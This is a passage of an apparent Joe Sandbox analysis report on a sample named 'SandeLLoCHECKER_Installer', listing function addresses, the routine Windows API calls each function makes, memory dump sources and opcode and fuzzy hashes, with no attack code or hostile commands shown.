                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 519fef07034ddc7b9085d947a42d8696ef95300717cbf582bd4fa3d3a56c5056
                                                                                                                        • Instruction ID: faa1ca8208ce6ff85128124d215a95ad3701b1fa75b98d5ef23d5d6ca511385c
                                                                                                                        • Opcode Fuzzy Hash: 519fef07034ddc7b9085d947a42d8696ef95300717cbf582bd4fa3d3a56c5056
                                                                                                                        • Instruction Fuzzy Hash: 625180B1D00209ABDF21DF98C845BBFB7B8FF15310F144519E911E7291EB359A05CBA2
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 009A6CF1
                                                                                                                        • EndDialog.USER32(00000000,00000001), ref: 009A6D00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2634769047-0
                                                                                                                        • Opcode ID: e56a171ae79bd7ef658fdb5174cb934f8c9d9fd4d389ecfbef98da49376c6a72
                                                                                                                        • Instruction ID: ca2811c8e4df390a70f653b8066c53b8318293f81b57d92cc55e3f97da36e8e1
                                                                                                                        • Opcode Fuzzy Hash: e56a171ae79bd7ef658fdb5174cb934f8c9d9fd4d389ecfbef98da49376c6a72
                                                                                                                        • Instruction Fuzzy Hash: FA519A30A01B85DFD711CF68CA48B4AFBF4FF4A314F1886ADD4559B2A1D774AA04CB91
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(009819D1), ref: 00982070
                                                                                                                        • DestroyWindow.USER32(00000000,?,00000000), ref: 00982127
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyErrorLastWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1182162058-0
                                                                                                                        • Opcode ID: 6e91b39d534832fd614a6e039732d4054c950b8b317de6ad3d4847c0c7687372
                                                                                                                        • Instruction ID: 174cd29162ea2c24b66ece6db636d02659f22c5dd1c175842cd4fdbc8a9376f9
                                                                                                                        • Opcode Fuzzy Hash: 6e91b39d534832fd614a6e039732d4054c950b8b317de6ad3d4847c0c7687372
                                                                                                                        • Instruction Fuzzy Hash: F821E47560010A5BD720AF08EC06BAA77A8EB55321F100276FD08CB791DB76E862DBE1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00963D30: LoadLibraryW.KERNEL32(ComCtl32.dll,C7BA013E,?,00000000,00000000), ref: 00963D6E
                                                                                                                          • Part of subcall function 00963D30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00963D91
                                                                                                                          • Part of subcall function 00963D30: FreeLibrary.KERNEL32(00000000), ref: 00963E0F
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00964764
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0096476F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3032493519-0
                                                                                                                        • Opcode ID: f9a5df82e657fb8e003d2fb718f237e9a3ceea305f298408c25ba743d1c48626
                                                                                                                        • Instruction ID: 1e6366a61de143b822d195b6b625bc8083cbeb010ee2c1ed109347da6ad927ba
                                                                                                                        • Opcode Fuzzy Hash: f9a5df82e657fb8e003d2fb718f237e9a3ceea305f298408c25ba743d1c48626
                                                                                                                        • Instruction Fuzzy Hash: A2F0653179121837F66021595C57F67B64DD781BA4F104276FE99AF2C2ECC67D0103E8
                                                                                                                        APIs
                                                                                                                        • LCMapStringEx.KERNEL32(?,00A3028A,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A2FF3C
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A3028A,?,?,00000000,?,00000000), ref: 00A2FF5A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2568140703-0
                                                                                                                        • Opcode ID: f910ed5145a1d4a724a3509f0603a96918e1b452ccdad3c069f6a87bfa3967ce
                                                                                                                        • Instruction ID: 528584ae2cd9f981fba2993644334f16dbbfb25de92fbf3615ecedabbf50b879
                                                                                                                        • Opcode Fuzzy Hash: f910ed5145a1d4a724a3509f0603a96918e1b452ccdad3c069f6a87bfa3967ce
                                                                                                                        • Instruction Fuzzy Hash: 7AF0683610012ABFCF126F94ED05ADE3E26AB48760B058125BA2865120CA32D872AB94
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-0
                                                                                                                        • Opcode ID: 49be2a9afdb170f6a846055442c98f7ead4e6a5f814e19af61aad81cc75530f8
                                                                                                                        • Instruction ID: 3a43008ac7e68ad9958614106f4e6198e0ce678130e3d1ae4c7f2bf9fd5d6eca
                                                                                                                        • Opcode Fuzzy Hash: 49be2a9afdb170f6a846055442c98f7ead4e6a5f814e19af61aad81cc75530f8
                                                                                                                        • Instruction Fuzzy Hash: 0501D232301211AFE6149B8DDC89F1EB759EFD4721F21422AF715EB2D0CE606C1287A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 10a4165fe97d7a423e3f9cfcbeb697dacf8a805d991e16647a1cb0cfdfa4f9d4
                                                                                                                        • Instruction ID: 0cd5ee52f61da6c97eae255c65db2318a716d103bcac14a60e3e6819742228e1
                                                                                                                        • Opcode Fuzzy Hash: 10a4165fe97d7a423e3f9cfcbeb697dacf8a805d991e16647a1cb0cfdfa4f9d4
                                                                                                                        • Instruction Fuzzy Hash: DBA159B1900708DFDB10CFA4D584B9ABBF4FF09314F14865EE85AAB391D775AA04CB91
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E,?,?,?), ref: 009A5BD4
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 24740636-0
                                                                                                                        • Opcode ID: ee41ba88222db79ce4d56e2226d84f8ac18c8fbe29153a2afd7a42c1fb7330ef
                                                                                                                        • Instruction ID: 8ead117fda8f658fcb8b992d59f09ad413cb1d9ccc33a5c956383013ce75ee85
                                                                                                                        • Opcode Fuzzy Hash: ee41ba88222db79ce4d56e2226d84f8ac18c8fbe29153a2afd7a42c1fb7330ef
                                                                                                                        • Instruction Fuzzy Hash: 94514671B006169FCB14CF68C988B6EBBB5FB49710F2685A9E815AB391D731ED01CBD0
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(E8458D00,?,00A35D9D,00A35D91,00000000), ref: 00A35B80
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-0
                                                                                                                        • Opcode ID: 762f36f0e9d1606d6951bfbcd8692ce0f6cc9a26593b5dd84b9d789704f291aa
                                                                                                                        • Instruction ID: 5797476250fb54841b497fb742056b59e9842af813f3081258fb72eb5ba8b311
                                                                                                                        • Opcode Fuzzy Hash: 762f36f0e9d1606d6951bfbcd8692ce0f6cc9a26593b5dd84b9d789704f291aa
                                                                                                                        • Instruction Fuzzy Hash: A95124719047589FDB218F3CCD84AE6BBB8EB46308F2405E9F59AC7142D234AE46DF20
                                                                                                                        APIs
                                                                                                                        • EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,0098A630,?), ref: 0098A54B
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLanguagesResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4141015960-0
                                                                                                                        • Opcode ID: 257445f0ced432395ff1e25554a107f7d848cc0626d8c6e566671fbb55081b14
                                                                                                                        • Instruction ID: 269bb6ca2f8d184fe74eb8a2b9ca49b278193af78a799c151cd7eeea3a11e4f7
                                                                                                                        • Opcode Fuzzy Hash: 257445f0ced432395ff1e25554a107f7d848cc0626d8c6e566671fbb55081b14
                                                                                                                        • Instruction Fuzzy Hash: D141907190020A9FEB10DFA4C884BDEBBF4FF44314F10062AE421A7781DBB5A945CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00965C40: __Init_thread_footer.LIBCMT ref: 00965CB6
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00965AB0
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 984842325-0
                                                                                                                        • Opcode ID: 8f87bab83ac41e468eda88b6ac0120cc18be4babdd31d65b16043651bee3b239
                                                                                                                        • Instruction ID: 9529da77c1e53ef62c3b7ea43b56ca758c7670010225c94ad96e08640195b2b0
                                                                                                                        • Opcode Fuzzy Hash: 8f87bab83ac41e468eda88b6ac0120cc18be4babdd31d65b16043651bee3b239
                                                                                                                        • Instruction Fuzzy Hash: D531DD71A04A44BBD710DF44EC82B89B7A4FB01B24F70D369E491977D0EFB668848B55
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0084B2E4
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 870464d10d12f105b9b8ff43dc878f60944ab27b089bd2be0a027fedde419263
                                                                                                                        • Instruction ID: b784b3af8ec9388b45c5542a6c944498cb47cd11dac508d938b3503a254c63e4
                                                                                                                        • Opcode Fuzzy Hash: 870464d10d12f105b9b8ff43dc878f60944ab27b089bd2be0a027fedde419263
                                                                                                                        • Instruction Fuzzy Hash: 7F219F70A01209EFCF14CFB5C858BAEBBB4FF48714F10465DE412AB690D774AA04CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A15673: EnterCriticalSection.KERNEL32(00B2FDD0,00000000,?,?,00849FC7,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0), ref: 00A1567E
                                                                                                                          • Part of subcall function 00A15673: LeaveCriticalSection.KERNEL32(00B2FDD0,?,00849FC7,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000,00000000), ref: 00A156AA
                                                                                                                        • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000), ref: 00849FE6
                                                                                                                          • Part of subcall function 0084A050: LoadResource.KERNEL32(00000000,00000000,C7BA013E,00000001,00000000,?,00000000,00A3DC40,000000FF,?,00849FFC,?,?,0084A1A0,00000000,00000000), ref: 0084A07B
                                                                                                                          • Part of subcall function 0084A050: LockResource.KERNEL32(00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A086
                                                                                                                          • Part of subcall function 0084A050: SizeofResource.KERNEL32(00000000,00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A094
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 529824247-0
                                                                                                                        • Opcode ID: 82d283a3a342513ff577491e806e3df994deaebc9f82a2177b98b4eddb8ba199
                                                                                                                        • Instruction ID: 41d5eec8086f7342133d27416fb2de4f54cc7263a8d6a7763f5921cd1aa32411
                                                                                                                        • Opcode Fuzzy Hash: 82d283a3a342513ff577491e806e3df994deaebc9f82a2177b98b4eddb8ba199
                                                                                                                        • Instruction Fuzzy Hash: 4811EB33F446149FD7258F59AC41B7AB3E8F7487A4F04017EED05D7380EA659C0146D1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00849F90: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000), ref: 00849FE6
                                                                                                                        • FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                          • Part of subcall function 0084A050: LoadResource.KERNEL32(00000000,00000000,C7BA013E,00000001,00000000,?,00000000,00A3DC40,000000FF,?,00849FFC,?,?,0084A1A0,00000000,00000000), ref: 0084A07B
                                                                                                                          • Part of subcall function 0084A050: LockResource.KERNEL32(00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A086
                                                                                                                          • Part of subcall function 0084A050: SizeofResource.KERNEL32(00000000,00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A094
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Find$LoadLockSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3127896203-0
                                                                                                                        • Opcode ID: 42c20f80b68f09c3ce7295c3fb68bb01bbc1ebfb31072506bafffb23d3d37872
                                                                                                                        • Instruction ID: 0978a04dd72357cb9d0084bc0e88e2389f13f4edfe873be21784a1044fe485e1
                                                                                                                        • Opcode Fuzzy Hash: 42c20f80b68f09c3ce7295c3fb68bb01bbc1ebfb31072506bafffb23d3d37872
                                                                                                                        • Instruction Fuzzy Hash: 01118C723001259BAB18ABACE88497BB39DFF88310714407AF945CF245EAA6DC1197A2
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000018,C7BA013E,00000018,?,00000000,?,?,00A7C5DD,000000FF), ref: 009A613B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 0bb580669c3d0c54df8942fb575ed98b0f07c4411023d574c97e079d86e4726b
                                                                                                                        • Instruction ID: 4ee8d6669eb090e44f909da1a4886b29711fee29ba1a0b54da30d933b2e88827
                                                                                                                        • Opcode Fuzzy Hash: 0bb580669c3d0c54df8942fb575ed98b0f07c4411023d574c97e079d86e4726b
                                                                                                                        • Instruction Fuzzy Hash: F5218471601208EFCB14DF64CC89F9EBBB8FB44710F144279E9159B291DB30A505CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 11c142047ab060c9490a520071031c489c429135b1207b5a8fbdd313a172f755
                                                                                                                        • Instruction ID: 33af2291f49ffc0508551cbc18d4dda96ef6c7f294a97a145323dea2fded23f3
                                                                                                                        • Opcode Fuzzy Hash: 11c142047ab060c9490a520071031c489c429135b1207b5a8fbdd313a172f755
                                                                                                                        • Instruction Fuzzy Hash: 2A014C72A48648EFC714CF54E841F2ABBB9FB59B10F10866EFC15CB750DB36A8108B54
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00965CB6
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2296764815-0
                                                                                                                        • Opcode ID: 2fa8a69680b0f6690d76fa4f48f01874368d92060f1949f7f55219b34b32d9ec
                                                                                                                        • Instruction ID: f3bdf72ce112dfc2a84af4c56c3392f50c8c4ccdd13e8cf0eb0ed030390d0915
                                                                                                                        • Opcode Fuzzy Hash: 2fa8a69680b0f6690d76fa4f48f01874368d92060f1949f7f55219b34b32d9ec
                                                                                                                        • Instruction Fuzzy Hash: 0201A271A44A44EBD720DB58DD43B49B3E4E705B20F2087A9E825D77D0EB7869008A41
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A17B2A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,8000000B,C7BA013E), ref: 00A17B8A
                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionHeapRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3789339297-0
                                                                                                                        • Opcode ID: b5742986d7181bbf6e9f63d6b47348e380566066bb7b9769cf25db4edd86d084
                                                                                                                        • Instruction ID: d26c4d30b66075382838d980ff4f1be6e75a8f3d1c88610522852e2bd189979a
                                                                                                                        • Opcode Fuzzy Hash: b5742986d7181bbf6e9f63d6b47348e380566066bb7b9769cf25db4edd86d084
                                                                                                                        • Instruction Fuzzy Hash: 30F08235A48248FFC705CF54DC05F5ABBA8F708B14F104569F819C66A0DB35A9118A45
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00A35D4E,?,?,00A35D4E,00000220,?,?,?), ref: 00A2E229
